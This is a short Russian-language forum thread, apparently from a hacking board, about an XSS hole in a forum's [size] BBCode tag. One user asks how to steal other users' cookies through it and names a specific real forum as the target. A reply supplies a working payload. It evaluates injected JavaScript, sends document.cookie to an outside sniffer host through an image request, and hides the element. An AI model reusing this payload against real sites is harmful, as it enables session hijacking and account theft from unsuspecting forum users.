В одном форуме есть XSS в теге size рабочий пример:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[size=expression(alert(document.cookie))]lol[/size][/QUOTE]<span id='postcolor'> подскажите пожалуйста какой запрос надо вставить что бы получить куки юзеров к вам на снифер.

Адрес приведи...
Или мы гадать должны какие там фильтры стоят ?

Извини вот адрес:
http://www.lewismedia.com/forums/index.php
P.S Если не лень подскажи где можно почитать про XSS очень интересная тема спасибо.

Вот такое работает
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
[size=expression(eval(this.innerText))]if(this.sss ==null){i=new Image();i.src="http:/"+"/antichat.ru/cgi-bin/s.jpg?"+document.cookie;this.sss=11;this.style.dis play="none"}[/size]
[/QUOTE]<span id='postcolor'>